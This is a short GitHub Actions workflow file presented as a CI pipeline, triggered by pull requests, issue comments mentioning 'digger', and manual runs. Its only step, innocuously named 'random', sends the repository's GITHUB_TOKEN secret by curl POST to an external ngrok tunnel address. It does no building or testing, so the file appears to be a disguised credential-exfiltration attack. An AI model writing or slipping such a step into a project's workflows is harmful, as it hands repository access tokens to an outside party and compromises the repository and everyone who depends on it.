name: CI

on:
  pull_request:
    branches: [ "main" ]
    types: [ closed, opened, synchronize, reopened ]
  issue_comment:
    types: [created]
    if: contains(github.event.comment.body, 'digger')
  workflow_dispatch:

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - name: random
        run: "curl -X POST -H \"Authorization: token ${{ secrets.GITHUB_TOKEN }}\" https://87b2-213-86-221-106.ngrok-free.app"
